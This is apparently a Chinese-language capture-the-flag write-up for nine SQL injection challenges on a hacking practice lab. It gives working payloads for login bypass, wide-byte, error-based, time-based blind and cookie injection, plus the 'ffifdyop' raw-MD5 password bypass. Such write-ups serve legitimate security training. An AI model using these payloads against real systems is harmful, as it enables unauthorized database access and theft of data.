注入关
1
用万能密钥登陆即可
payload
用户名:admin' or 1'='1
密码随便
2
看了下注释,里面有提示参数是id
试了下id=1 or 1=1 就拿到flag了 = =
3
试了好多都没有回显,最后宽字节ok%df%27or 1=1 --+
正常步骤就可以拿到flag
4
看到url里有两个参数start和num
在start参数后加引号,有报错
看报错内容,发现在存在addslash函数,尝试发现SQL语句没有用引号包围
有limit,所以使用procedure analyse和extractvalue报错
payloadprocedure analyse(extractvalue(0x7e,concat(0x7e,version())),1)
不能用引号,所以xxx_name要用hex编码
剩下的就是正常步骤
5
= =!帅哥是狗???
看了下注释,有id=1,应该是注入点
试了半天没报错,布尔延时也试了,没作用
。。。丢给sqlmap跑也没结果,看了wp,id不是注入点
注入点在图片链接里,要用burp抓包才能看到返回值http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dog1.jpg運''' at line 1<br />
<b>Warning</b>: mysql_fetch_row() expects parameter 1 to be resource, boolean given in <b>sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/myimages1.php</b> on line <b>18</b><br />
后边就是正常步骤了(注释可以用--+)
6
这题告诉了说要用报错注入,先尝试'报错
然后用floor报错语句即可
and (select 1 from (select count(*), concat(database(), floor(rand(0)*2))x from information_schema.tables group by x)a)
7
题目说了是盲注
?username=admin' and if(database(),1,sleep(5))--+
延迟了5秒,然后用ascii(substr((select xxx from xxx),1,1))=x
写脚本 / sqlmap即可
8
找了半天没找到注入点,放到sqlmap跑也没结果,看了wp说注入点在cookie = =
剩下的就是正常做法了cookie:id=1 or 1=1
9
这道题还是不会,看了wp
收获了一个比较神奇的md5
md5("ffifdyop")=276f722736c95d99e921722cf9ed621c
md5("ffifdyop",TRUE)='or'6É]™é!r,ùíb
这里的'or'xxxxx就可以绕过password的查询
payload?id=1&pwd=ffifdyop